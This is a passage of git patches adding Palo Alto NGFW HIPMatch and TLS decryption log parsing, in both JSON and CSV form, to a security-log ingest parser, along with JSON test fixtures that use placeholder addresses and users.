Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "hipmatch",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-20T16:30:28Z",
+    "action": {
+      "type": "hipmatch"
+    },
+    "host": {
+      "name": "DESKTOP-01"
+    },
+    "log": {
+      "hostname": "FW-ALK01",
+      "logger": "hipmatch"
+    },
+    "observer": {
+      "name": "FW-ALK01",
+      "product": "PAN-OS",
+      "serial_number": "no-serial"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "12",
+      "DGHierarchyLevel2": "22",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "hipmatch",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
+      "endpoint": {
+        "serial_number": "aefee8"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "jdoe",
+        "jdoe@example.org"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "user": {
+        "name": "jdoe@example.org"
+      }
+    },
+    "user": {
+      "domain": "example.org",
+      "email": "jdoe@example.org",
+      "name": "jdoe"
+    }
+  }
+}

From 3aa5e742b94a0c9afa7f7572496254a95354dffd Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 20 Nov 2024 18:23:49 +0100
Subject: [PATCH 263/317] fix(PaloAlto): extract host id and rule name for
 HIPMatch

---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml          | 4 ++--
 .../paloalto-ngfw/tests/globalprotect_csv.json              | 1 +
 .../paloalto-ngfw/tests/globalprotect_csv_2.json            | 1 +
 .../paloalto-ngfw/tests/test_globalprotect.json             | 1 +
 .../paloalto-ngfw/tests/test_hipmatch_json.json             | 6 +++++-
 .../paloalto-ngfw/tests/test_new_globalprotect.json         | 1 +
 6 files changed, 11 insertions(+), 3 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index b7ec21cac..ba7fd4535 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -592,7 +592,7 @@ stages:
           event.module: "{{parsed_description.message.module}}"
           host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
           host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}"
-          host.id: "{{parsed_event.message.deviceExternalId}}"
+          host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
           host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
           host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
           host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -617,7 +617,7 @@ stages:
           observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
           observer.serial_number: "{{parsed_event.message.DeviceSN}}"
           observer.name: "{{parsed_event.message.DeviceName}}"
-          rule.name: "{{parsed_event.message.Rule}}"
+          rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
           rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
           source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 65f2b6940..127226ee3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
@@ -21,6 +21,7 @@
       "type": "0"
     },
     "host": {
+      "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
       "name": "AAAABBBBB",
       "os": {
         "version": "Microsoft Windows 10 Pro , 64-bit"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index e4b1d5fab..1d68c400c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
@@ -21,6 +21,7 @@
       "type": "0"
     },
     "host": {
+      "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3",
       "name": "2021-02707",
       "os": {
         "version": "Microsoft Windows 10 Enterprise , 64-bit"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
index f08a677ef..8eac8428d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
@@ -21,6 +21,7 @@
       "type": "0"
     },
     "host": {
+      "id": "662f0b44-e024-4a70",
       "name": "2023-01724",
       "os": {
         "version": "Microsoft Windows 10 Enterprise , 64-bit"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json
index 952e819e2..b0b294778 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json	
@@ -24,6 +24,7 @@
       "type": "hipmatch"
     },
     "host": {
+      "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4",
       "name": "DESKTOP-01"
     },
     "log": {
@@ -56,6 +57,9 @@
         "jdoe@example.org"
       ]
     },
+    "rule": {
+      "name": "VPN Compliant"
+    },
     "source": {
       "address": "1.2.3.4",
       "ip": "1.2.3.4",
@@ -69,4 +73,4 @@
       "name": "jdoe"
     }
   }
-}
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
index 25db7ff0a..c0622d09c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
@@ -25,6 +25,7 @@
       "type": "globalprotect"
     },
     "host": {
+      "id": "e4f14dfd-bd3c-40e5-9c4e",
       "name": "LNL-test"
     },
     "log": {

From 45faefddb4854625e6a8c01fda4a52418f4a62f1 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 20 Nov 2024 18:27:19 +0100
Subject: [PATCH 264/317] fix(PaloAlto): add support for HipMatch dsv events

---
 .../paloalto-ngfw/ingest/parser.yml           | 43 +++++++++++
 .../tests/test_hipmatch_csv.json              | 73 +++++++++++++++++++
 2 files changed, 116 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index ba7fd4535..ea07e1d10 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -382,6 +382,49 @@ pipeline:
           - HighResolutionTimestamp
         delimiter: ","
 
+  # HIPMATCH CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - PaloAltoDomain
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - ConfigVersion
+          - GenerateTime
+          - SourceUser
+          - VirtualLocation
+          - MachineName
+          - EndpointOSType
+          - SourceAddress
+          - HipMatchName
+          - RepeatCount
+          - HIPMatchType
+          - FUTURE_USE
+          - FUTURE_USE
+          - SequenceNumber
+          - ActionFlags
+          - DGHierarchyLevel1
+          - DGHierarchyLevel2
+          - DGHierarchyLevel3
+          - DGHierarchyLevel4
+          - VirtualSystemName
+          - DeviceName
+          - VirtualSystemID
+          - SourceIPv6
+          - HostID
+          - EndpointSerialNumber
+          - SourceDeviceMac
+          - HighResolutionTimestamp
+          - ClusterName
+        delimiter: ","
+
   - name: parsed_timestamp
     external:
       name: date.parse
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json
new file mode 100644
index 000000000..d32952899
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json	
@@ -0,0 +1,73 @@
+{
+  "input": {
+    "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "hipmatch",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-03T17:50:04.310000Z",
+    "action": {
+      "type": "0"
+    },
+    "host": {
+      "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4",
+      "name": "DESKTOP-01"
+    },
+    "log": {
+      "hostname": "FW-CIV1",
+      "logger": "hipmatch"
+    },
+    "observer": {
+      "name": "FW-CIV1",
+      "product": "PAN-OS",
+      "serial_number": "111111111111"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "28",
+      "DGHierarchyLevel2": "99",
+      "DGHierarchyLevel3": "38",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
+      "endpoint": {
+        "serial_number": "aefee8"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "VPN Compliant"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "user": {
+        "name": "jdoe"
+      }
+    },
+    "user": {
+      "name": "jdoe"
+    }
+  }
+}
\ No newline at end of file

From caa9e0ca8bb19e04ea9ebec30f3419cf3190ce53 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 20 Nov 2024 19:02:45 +0100
Subject: [PATCH 265/317] fix(PaloAlto): improve support for decryption events

---
 .../paloalto-ngfw/_meta/fields.yml            |  17 ++-
 .../paloalto-ngfw/ingest/parser.yml           |  10 ++
 .../tests/test_decryption_json.json           | 118 ++++++++++++++++++
 3 files changed, 144 insertions(+), 1 deletion(-)
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json

diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml
index e42125a42..4b07b6065 100644
--- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml	
@@ -318,7 +318,22 @@ paloalto.threat.type:
   name: paloalto.threat.type
   type: keyword
 
+paloalto.tls.chain_status:
+  description: The trust in the TLS chain
+  name: paloalto.tls.chain_status
+  type: keyword
+
+paloalto.tls.root_status:
+  description: The trust in the root certificate
+  name: paloalto.tls.root_status
+  type: keyword
+
+paloalto.tls.sni:
+  description: The server name indication
+  name: paloalto.tls.sni
+  type: keyword
+
 paloalto.vsys:
-  description: The virtual system
+  description: the virtual system
   name: paloalto.vsys
   type: keyword
diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index ea07e1d10..c4abfd388 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -651,6 +651,13 @@ stages:
           network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
           network.protocol: "{{parsed_description.message.proto}}"
           network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+          tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+          tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+          tls.curve: "{{parsed_event.message.EllipticCurve}}"
+          tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+          tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+          tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+          tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
           observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
           observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
           observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -795,6 +802,9 @@ stages:
           paloalto.vsys: "{{parsed_description.message.vsys}}"
           paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}"
           paloalto.server.profile: "{{parsed_description.message.server_profile}}"
+          paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+          paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+          paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
       - set:
           paloalto.threat.type: >
             {%- set id = parsed_threat.message.threat_code | int -%}
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json
new file mode 100644
index 000000000..bef30109a
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json	
@@ -0,0 +1,118 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "decryption",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-20T16:39:51Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "start"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "8.7.6.5",
+        "port": 443
+      },
+      "port": 443
+    },
+    "log": {
+      "logger": "decryption"
+    },
+    "network": {
+      "application": "incomplete"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "INTERNET"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "VPN-SSL"
+        }
+      },
+      "product": "PAN-OS",
+      "serial_number": "no-serial"
+    },
+    "paloalto": {
+      "Threat_ContentType": "start",
+      "VirtualLocation": "vsys1",
+      "tls": {
+        "chain_status": "Trusted",
+        "root_status": "trusted",
+        "sni": "static.files.example.org"
+      }
+    },
+    "related": {
+      "hash": [
+        "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "8.7.6.5"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "URL Filtering - Chrome Profile",
+      "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "4.3.2.1",
+        "port": 1042
+      },
+      "port": 58877,
+      "user": {
+        "domain": "example",
+        "name": "jdoe"
+      }
+    },
+    "tls": {
+      "curve": "secp256r1",
+      "server": {
+        "hash": {
+          "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b"
+        },
+        "x509": {
+          "issuer": {
+            "common_name": "GlobalSign ECC OV SSL CA 2018"
+          }
+        }
+      },
+      "version": "1.2"
+    },
+    "user": {
+      "domain": "example",
+      "name": "jdoe"
+    }
+  }
+}
\ No newline at end of file

From c3dd2fd72690727297bbc75a2af3654af6dac91c Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 20 Nov 2024 19:03:17 +0100
Subject: [PATCH 266/317] fix(PaloAlto): add support for DSV Decryption events

---
 .../paloalto-ngfw/ingest/parser.yml           | 118 ++++++++++++++++++
 .../tests/test_decryption_csv.json            |  98 +++++++++++++++
 2 files changed, 216 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index c4abfd388..944713355 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -425,6 +425,124 @@ pipeline:
           - ClusterName
         delimiter: ","
 
+  # DECRYPTION CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - PaloAltoDomain
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - ConfigVersion
+          - GenerateTime
+          - SourceAddress
+          - DestinationAddress
+          - NATSourceIP
+          - NATDestinationIP
+          - Rule
+          - SourceUser
+          - DestinationUser
+          - Application
+          - VirtualLocation
+          - SourceZone
+          - DestinationZone
+          - InboundInterface
+          - OutboundInterface
+          - LogAction
+          - TimeLogged
+          - SessionID
+          - RepeatCount
+          - SourcePort
+          - DestinationPort
+          - NATSourcePort
+          - NATDestinationPort
+          - Flags
+          - IPProtocol
+          - Action
+          - Tunnel
+          - FUTURE_USE
+          - FUTURE_USE
+          - SourceVMUUID
+          - DestinationVMUUID
+          - UUIDforrule
+          - StageforClienttoFirewall
+          - StageforFirewalltoServer
+          - TLSVersion
+          - TLSKeyExchange
+          - TLSEncryptionAlgorithm
+          - TLS_AUTH
+          - PolicyName
+          - EllipticCurve
+          - ErrorIndex
+          - RootStatus
+          - ChainStatus
+          - ProxyType
+          - CertificateSerialNumber
+          - Fingerprint
+          - CertificateStartDate
+          - CertificateEndDate
+          - CertificateVersion
+          - CertificateSize
+          - CommonNameLength
+          - IssuerCommonNameLength
+          - RootCommonNameLength
+          - SNILength
+          - CertificateFlags
+          - SubjectCommonName
+          - IssuerSubjectCommonName
+          - RootSubjectCommonName
+          - ServerNameIndication
+          - Error
+          - ContainerID
+          - PODNamespace
+          - PODName
+          - SourceExternalDynamicList
+          - DestinationExternalDynamicList
+          - SourceDynamicAddressGroup
+          - DestinationDynamicAddressGroup
+          - HighResTimestamp
+          - SourceDeviceCategory
+          - SourceDeviceProfile
+          - SourceDeviceModel
+          - SourceDeviceVendor
+          - SourceDeviceOSFamily
+          - SourceDeviceOSVersion
+          - SourceHostname
+          - SourceMACAddress
+          - DestinationDeviceCategory
+          - DestinationDeviceProfile
+          - DestinationDeviceModel
+          - DestinationDeviceVendor
+          - DestinationDeviceOSFamily
+          - DestinationDeviceOSVersion
+          - DestinationHostname
+          - DestinationMACAddress
+          - SequenceNumber
+          - ActionFlags
+          - DGHierarchyLevel1
+          - DGHierarchyLevel2
+          - DGHierarchyLevel3
+          - DGHierarchyLevel4
+          - VirtualSystemName
+          - DeviceName
+          - VirtualSystemID
+          - ApplicationSubcategory
+          - ApplicationCategory
+          - ApplicationTechnology
+          - ApplicationRisk
+          - ApplicationCharacteristic
+          - ApplicationContainer
+          - ApplicationSaaS
+          - ApplicationSanctionedState
+          - ClusterName
+        delimiter: ","
+
   - name: parsed_timestamp
     external:
       name: date.parse
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json
new file mode 100644
index 000000000..6a413f53b
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json	
@@ -0,0 +1,98 @@
+{
+  "input": {
